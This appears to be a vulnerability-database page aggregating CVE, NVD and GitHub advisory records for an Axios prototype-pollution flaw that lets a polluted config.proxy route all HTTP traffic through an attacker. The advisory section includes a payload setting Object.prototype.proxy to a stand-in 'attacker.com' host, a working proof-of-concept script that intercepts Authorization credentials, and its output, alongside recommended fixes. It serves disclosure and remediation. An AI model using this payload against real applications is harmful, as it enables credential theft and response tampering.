CVE-2026-44494 (GCVE-0-2026-44494)

Vulnerability from cvelistv5 – Published: 2026-06-11 15:32 – Updated: 2026-06-11 17:24

Title

Axios: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Summary

Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0.

Severity

8.7 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-441 - Unintended Proxy or Intermediary ('Confused Deputy')
CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/axios/axios/security/advisorie…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
axios	axios	Affected: >= 1.0.0, < 1.16.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44494",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-11T17:23:58.160826Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-11T17:24:01.932Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "axios",
          "vendor": "axios",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0.0, \u003c 1.16.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution in the application\u0027s dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker\u0027s proxy server. This vulnerability is fixed in 1.16.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-441",
              "description": "CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-11T15:32:03.155Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
        }
      ],
      "source": {
        "advisory": "GHSA-35jp-ww65-95wh",
        "discovery": "UNKNOWN"
      },
      "title": "Axios: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44494",
    "datePublished": "2026-06-11T15:32:03.155Z",
    "dateReserved": "2026-05-06T17:18:51.783Z",
    "dateUpdated": "2026-06-11T17:24:01.932Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44494\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-11T17:16:33.313\",\"lastModified\":\"2026-06-11T17:16:33.313\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution \\\"Gadget\\\" attack that allows any Object.prototype pollution in the application\u0027s dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker\u0027s proxy server. This vulnerability is fixed in 1.16.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":5.8}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-441\"},{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-44494

Vulnerability from fkie_nvd - Published: 2026-06-11 17:16 - Updated: 2026-06-11 17:16

Severity

8.7 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution in the application\u0027s dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker\u0027s proxy server. This vulnerability is fixed in 1.16.0."
    }
  ],
  "id": "CVE-2026-44494",
  "lastModified": "2026-06-11T17:16:33.313",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.8,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-11T17:16:33.313",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-441"
        },
        {
          "lang": "en",
          "value": "CWE-1321"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-35JP-WW65-95WH

Vulnerability from github – Published: 2026-05-29 16:04 – Updated: 2026-05-29 16:04

Summary

axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Details

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Summary

The Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials.

The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server.

Unlike the transformResponse gadget (which is constrained by assertOptions to return true), the proxy gadget has zero constraints — the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.

Severity: Critical (CVSS 9.4) Affected Versions: All versions (v0.x - v1.x including v1.15.0) Vulnerable Component: lib/adapters/http.js (config property access on merged object)

CWE

CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')

CVSS 3.1

Score: 9.4 (Critical)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Metric	Value	Justification
Attack Vector	Network	PP is triggered remotely via any vulnerable dependency
Attack Complexity	Low	Once PP exists, single property assignment: `Object.prototype.proxy = {host:'attacker', port:8080}`. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology
Privileges Required	None	No authentication needed
User Interaction	None	No user interaction required
Scope	Unchanged	MITM within the application's network context
Confidentiality	High	Attacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames)
Integrity	High	Attacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. No constraints — unlike `transformResponse` which must return `true`
Availability	Low	Attacker could drop requests or return errors, but this is secondary to C/I impact

Why This Bypasses mergeConfig

The critical difference from transformResponse: the proxy property is not in defaults (lib/defaults/index.js does not set proxy). This means:

mergeConfig iterates Object.keys({...defaults, ...userConfig}) — proxy is NOT in this set
defaultToConfig2 for proxy is never called
The merged config has no own proxy property
When http.js:670 reads config.proxy, JavaScript traverses the prototype chain
Object.prototype.proxy is found → used by setProxy()

This is a more direct attack path than transformResponse because it doesn't even go through mergeConfig's merge logic — it completely bypasses it.

Usage of "Helper" Vulnerabilities

This vulnerability requires Zero Direct User Input.

If an attacker can pollute Object.prototype via any other library in the stack (e.g., qs, minimist, lodash, body-parser), Axios will automatically use the polluted proxy value when making HTTP requests. The developer's code is completely safe — no configuration errors needed.

Proof of Concept

1. The Setup (Simulated Pollution)

Imagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:

Object.prototype.proxy = {
  host: 'attacker.com',
  port: 8080,
  protocol: 'http',
};

2. The Gadget Trigger (Safe Code)

The application makes a completely safe, hardcoded request:

// This looks safe to the developer — no proxy configured
const response = await axios.get('https://api.internal.corp/secrets', {
  auth: { username: 'svc-account', password: 'prod-key-abc123!' }
});

3. The Execution

At http.js:668-670:

setProxy(
  options,
  config.proxy,    // ← traverses prototype chain → finds polluted proxy
  protocol + '//' + parsed.hostname + (parsed.port ? ':' + parsed.port : '') + options.path
);

setProxy() at http.js:191-239 then:

function setProxy(options, configProxy, location) {
  let proxy = configProxy;    // = { host: 'attacker.com', port: 8080 }
  // ...
  if (proxy) {
    options.hostname = proxy.hostname || proxy.host;  // → 'attacker.com'
    options.port = proxy.port;                         // → 8080
    options.path = location;                           // → full URL as path
    // ...
  }
}

4. The Impact (Full MITM)

The attacker's proxy server receives:

GET http://api.internal.corp/secrets HTTP/1.1
Host: api.internal.corp
Authorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==
User-Agent: axios/1.15.0
Accept: application/json, text/plain, */*

The Authorization header contains svc-account:prod-key-abc123! in Base64. The attacker: - Sees every request URL, header, and body - Modifies every response (inject malicious data, change auth results) - Logs all API keys, session tokens, and passwords - Operates as an invisible proxy — the developer has no indication

5. Verified PoC Code

import http from 'http';
import axios from './index.js';

// Attacker's proxy server
const intercepted = [];
const proxyServer = http.createServer((req, res) => {
  intercepted.push({
    url: req.url,
    authorization: req.headers.authorization,
    headers: req.headers,
  });
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end('{"hijacked":true}');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Real target server
const realServer = http.createServer((req, res) => {
  res.writeHead(200);
  res.end('{"data":"real"}');
});
await new Promise(r => realServer.listen(0, r));
const realPort = realServer.address().port;

// Prototype pollution
Object.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' };

// "Safe" request — goes through attacker's proxy
const resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {
  auth: { username: 'admin', password: 'SuperSecret123!' }
});

console.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server');
console.log('Intercepted Authorization:', intercepted[0]?.authorization);
// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)

delete Object.prototype.proxy;
realServer.close();
proxyServer.close();

Verified PoC Output

[1] Normal request (before pollution):
    Response source: real server
    response.data: {"data":"from-real-server"}
    Proxy intercept count: 0

[2] Prototype Pollution: Object.prototype.proxy
    Set: Object.prototype.proxy = { host: "127.0.0.1", port: 50879 }

[3] Request after pollution (same code, same URL):
    Response source: ATTACKER PROXY!
    response.data: {"data":"from-attacker-proxy","hijacked":true}

[4] Data intercepted by attacker's proxy:
    Full URL: http://127.0.0.1:50878/api/secrets
    Host: 127.0.0.1:50878
    Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh
    All headers: {
      "accept": "application/json, text/plain, */*",
      "user-agent": "axios/1.15.0",
      "accept-encoding": "gzip, compress, deflate, br",
      "host": "127.0.0.1:50878",
      "authorization": "Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh",
      "connection": "keep-alive"
    }

[5] Attacker capabilities demonstrated:
    ✓ Full URL visible (including internal hostnames)
    ✓ Authorization header visible (Base64-encoded credentials)
    ✓ Can modify/forge response data
    ✓ Affects ALL axios HTTP requests (not just a single instance)
    ✓ No assertOptions constraints (unlike transformResponse gadget)

Impact Analysis

Full Credential Interception: Every HTTP request's Authorization header, cookies, API keys, and request bodies are visible to the attacker's proxy in plaintext.
Arbitrary Response Tampering: The attacker can return any response data — no constraints like transformResponse's "must return true".
Internal Network Reconnaissance: The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.
Universal Scope: Affects every axios HTTP request in the application, including all third-party libraries that use axios.
Invisible Attack: The developer has no indication that a proxy has been injected — requests complete normally with attacker-controlled responses.
Bypass of 1.15.0 Fix: The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.

Why This Is More Severe Than transformResponse (axios_26)

Dimension	transformResponse Gadget	proxy Gadget
Data access	`this.auth` + response data	All headers, auth, body, URL, response
Response control	Must return `true`	Arbitrary responses
Attack visibility	Response becomes `true` (suspicious)	Normal-looking responses (invisible)
mergeConfig involvement	Goes through defaultToConfig2	Bypasses mergeConfig entirely

Recommended Fix

Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties

// In lib/adapters/http.js
const proxy = Object.prototype.hasOwnProperty.call(config, 'proxy') ? config.proxy : undefined;
setProxy(options, proxy, location);

Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`

Properties not in defaults that are read by http.js and have security impact: - config.proxy — MITM - config.socketPath — Unix socket SSRF - config.transport — request hijack - config.lookup — DNS hijack - config.beforeRedirect — redirect manipulation - config.httpAgent / config.httpsAgent — agent injection

All should use hasOwnProperty checks.

Fix 3: Use null-prototype object for merged config

// In lib/core/mergeConfig.js
const config = Object.create(null);

Resources

Timeline

Date	Event
2026-04-16	Vulnerability discovered during source code audit
2026-04-16	PoC developed and verified — full MITM confirmed
TBD	Report submitted to vendor via GitHub Security Advisory

Severity

8.7 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.16.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44494"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-441",
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T16:04:00Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`\n\n## Summary\n\nThe Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any `Object.prototype` pollution in the application\u0027s dependency tree to be escalated into a **full Man-in-the-Middle (MITM) attack** \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials.\n\nThe HTTP adapter at `lib/adapters/http.js:670` reads `config.proxy` via standard property access, which traverses the prototype chain. Because `proxy` is **not present in Axios defaults**, the merged config object has no own `proxy` property, making it trivially injectable via prototype pollution. Once injected, `setProxy()` routes **all** HTTP requests through the attacker\u0027s proxy server.\n\nUnlike the `transformResponse` gadget (which is constrained by `assertOptions` to return `true`), the proxy gadget has **zero constraints** \u2014 the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.\n\n**Severity:** Critical (CVSS 9.4)\n**Affected Versions:** All versions (v0.x - v1.x including v1.15.0)\n**Vulnerable Component:** `lib/adapters/http.js` (config property access on merged object)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\n- **CWE-441:** Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)\n\n## CVSS 3.1\n\n**Score: 9.4 (Critical)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP is triggered remotely via any vulnerable dependency |\n| Attack Complexity | Low | Once PP exists, single property assignment: `Object.prototype.proxy = {host:\u0027attacker\u0027, port:8080}`. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | MITM within the application\u0027s network context |\n| Confidentiality | **High** | Attacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames) |\n| Integrity | **High** | Attacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. **No constraints** \u2014 unlike `transformResponse` which must return `true` |\n| Availability | Low | Attacker could drop requests or return errors, but this is secondary to C/I impact |\n\n\n### Why This Bypasses mergeConfig\n\nThe critical difference from `transformResponse`: the `proxy` property is **not in defaults** (`lib/defaults/index.js` does not set `proxy`). This means:\n\n1. `mergeConfig` iterates `Object.keys({...defaults, ...userConfig})` \u2014 `proxy` is NOT in this set\n2. `defaultToConfig2` for `proxy` is never called\n3. The merged config has **no own `proxy` property**\n4. When `http.js:670` reads `config.proxy`, JavaScript traverses the prototype chain\n5. `Object.prototype.proxy` is found \u2192 used by `setProxy()`\n\nThis is a **more direct attack path** than `transformResponse` because it doesn\u0027t even go through `mergeConfig`\u0027s merge logic \u2014 it completely bypasses it.\n\n## Usage of \"Helper\" Vulnerabilities\n\nThis vulnerability requires **Zero Direct User Input**.\n\nIf an attacker can pollute `Object.prototype` via any other library in the stack (e.g., `qs`, `minimist`, `lodash`, `body-parser`), Axios will automatically use the polluted `proxy` value when making HTTP requests. The developer\u0027s code is completely safe \u2014 no configuration errors needed.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\n\nImagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:\n\n```javascript\nObject.prototype.proxy = {\n  host: \u0027attacker.com\u0027,\n  port: 8080,\n  protocol: \u0027http\u0027,\n};\n```\n\n### 2. The Gadget Trigger (Safe Code)\n\nThe application makes a completely safe, hardcoded request:\n\n```javascript\n// This looks safe to the developer \u2014 no proxy configured\nconst response = await axios.get(\u0027https://api.internal.corp/secrets\u0027, {\n  auth: { username: \u0027svc-account\u0027, password: \u0027prod-key-abc123!\u0027 }\n});\n```\n\n### 3. The Execution\n\nAt `http.js:668-670`:\n```javascript\nsetProxy(\n  options,\n  config.proxy,    // \u2190 traverses prototype chain \u2192 finds polluted proxy\n  protocol + \u0027//\u0027 + parsed.hostname + (parsed.port ? \u0027:\u0027 + parsed.port : \u0027\u0027) + options.path\n);\n```\n\n`setProxy()` at `http.js:191-239` then:\n```javascript\nfunction setProxy(options, configProxy, location) {\n  let proxy = configProxy;    // = { host: \u0027attacker.com\u0027, port: 8080 }\n  // ...\n  if (proxy) {\n    options.hostname = proxy.hostname || proxy.host;  // \u2192 \u0027attacker.com\u0027\n    options.port = proxy.port;                         // \u2192 8080\n    options.path = location;                           // \u2192 full URL as path\n    // ...\n  }\n}\n```\n\n### 4. The Impact (Full MITM)\n\nThe attacker\u0027s proxy server receives:\n\n```http\nGET http://api.internal.corp/secrets HTTP/1.1\nHost: api.internal.corp\nAuthorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==\nUser-Agent: axios/1.15.0\nAccept: application/json, text/plain, */*\n```\n\nThe `Authorization` header contains `svc-account:prod-key-abc123!` in Base64. The attacker:\n- **Sees** every request URL, header, and body\n- **Modifies** every response (inject malicious data, change auth results)\n- **Logs** all API keys, session tokens, and passwords\n- Operates as an **invisible** proxy \u2014 the developer has no indication\n\n### 5. Verified PoC Code\n\n```javascript\nimport http from \u0027http\u0027;\nimport axios from \u0027./index.js\u0027;\n\n// Attacker\u0027s proxy server\nconst intercepted = [];\nconst proxyServer = http.createServer((req, res) =\u003e {\n  intercepted.push({\n    url: req.url,\n    authorization: req.headers.authorization,\n    headers: req.headers,\n  });\n  res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 });\n  res.end(\u0027{\"hijacked\":true}\u0027);\n});\nawait new Promise(r =\u003e proxyServer.listen(0, r));\nconst proxyPort = proxyServer.address().port;\n\n// Real target server\nconst realServer = http.createServer((req, res) =\u003e {\n  res.writeHead(200);\n  res.end(\u0027{\"data\":\"real\"}\u0027);\n});\nawait new Promise(r =\u003e realServer.listen(0, r));\nconst realPort = realServer.address().port;\n\n// Prototype pollution\nObject.prototype.proxy = { host: \u0027127.0.0.1\u0027, port: proxyPort, protocol: \u0027http\u0027 };\n\n// \"Safe\" request \u2014 goes through attacker\u0027s proxy\nconst resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {\n  auth: { username: \u0027admin\u0027, password: \u0027SuperSecret123!\u0027 }\n});\n\nconsole.log(\u0027Response from:\u0027, resp.data.hijacked ? \u0027ATTACKER PROXY\u0027 : \u0027real server\u0027);\nconsole.log(\u0027Intercepted Authorization:\u0027, intercepted[0]?.authorization);\n// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)\n\ndelete Object.prototype.proxy;\nrealServer.close();\nproxyServer.close();\n```\n\n## Verified PoC Output\n\n```\n[1] Normal request (before pollution):\n    Response source: real server\n    response.data: {\"data\":\"from-real-server\"}\n    Proxy intercept count: 0\n\n[2] Prototype Pollution: Object.prototype.proxy\n    Set: Object.prototype.proxy = { host: \"127.0.0.1\", port: 50879 }\n\n[3] Request after pollution (same code, same URL):\n    Response source: ATTACKER PROXY!\n    response.data: {\"data\":\"from-attacker-proxy\",\"hijacked\":true}\n\n[4] Data intercepted by attacker\u0027s proxy:\n    Full URL: http://127.0.0.1:50878/api/secrets\n    Host: 127.0.0.1:50878\n    Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\n    All headers: {\n      \"accept\": \"application/json, text/plain, */*\",\n      \"user-agent\": \"axios/1.15.0\",\n      \"accept-encoding\": \"gzip, compress, deflate, br\",\n      \"host\": \"127.0.0.1:50878\",\n      \"authorization\": \"Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh\",\n      \"connection\": \"keep-alive\"\n    }\n\n[5] Attacker capabilities demonstrated:\n    \u2713 Full URL visible (including internal hostnames)\n    \u2713 Authorization header visible (Base64-encoded credentials)\n    \u2713 Can modify/forge response data\n    \u2713 Affects ALL axios HTTP requests (not just a single instance)\n    \u2713 No assertOptions constraints (unlike transformResponse gadget)\n```\n\n## Impact Analysis\n\n- **Full Credential Interception:** Every HTTP request\u0027s `Authorization` header, cookies, API keys, and request bodies are visible to the attacker\u0027s proxy in plaintext.\n- **Arbitrary Response Tampering:** The attacker can return any response data \u2014 no constraints like `transformResponse`\u0027s \"must return true\".\n- **Internal Network Reconnaissance:** The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.\n- **Universal Scope:** Affects every axios HTTP request in the application, including all third-party libraries that use axios.\n- **Invisible Attack:** The developer has no indication that a proxy has been injected \u2014 requests complete normally with attacker-controlled responses.\n- **Bypass of 1.15.0 Fix:** The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.\n\n### Why This Is More Severe Than transformResponse (axios_26)\n\n| Dimension | transformResponse Gadget | **proxy Gadget** |\n|---|---|---|\n| Data access | `this.auth` + response data | **All headers, auth, body, URL, response** |\n| Response control | Must return `true` | **Arbitrary responses** |\n| Attack visibility | Response becomes `true` (suspicious) | **Normal-looking responses (invisible)** |\n| mergeConfig involvement | Goes through defaultToConfig2 | **Bypasses mergeConfig entirely** |\n\n## Recommended Fix\n\n### Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties\n\n```javascript\n// In lib/adapters/http.js\nconst proxy = Object.prototype.hasOwnProperty.call(config, \u0027proxy\u0027) ? config.proxy : undefined;\nsetProxy(options, proxy, location);\n```\n\n### Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`\n\nProperties not in defaults that are read by http.js and have security impact:\n- `config.proxy` \u2014 MITM\n- `config.socketPath` \u2014 Unix socket SSRF\n- `config.transport` \u2014 request hijack\n- `config.lookup` \u2014 DNS hijack\n- `config.beforeRedirect` \u2014 redirect manipulation\n- `config.httpAgent` / `config.httpsAgent` \u2014 agent injection\n\nAll should use `hasOwnProperty` checks.\n\n### Fix 3: Use null-prototype object for merged config\n\n```javascript\n// In lib/core/mergeConfig.js\nconst config = Object.create(null);\n```\n\n## Resources\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [CWE-441: Unintended Proxy](https://cwe.mitre.org/data/definitions/441.html)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios (Fixed in 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)\n\n## Timeline\n\n| Date | Event |\n|---|---|\n| 2026-04-16 | Vulnerability discovered during source code audit |\n| 2026-04-16 | PoC developed and verified \u2014 full MITM confirmed |\n| TBD | Report submitted to vendor via GitHub Security Advisory |",
  "id": "GHSA-35jp-ww65-95wh",
  "modified": "2026-05-29T16:04:00Z",
  "published": "2026-05-29T16:04:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-fvcv-3m26-pcqx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
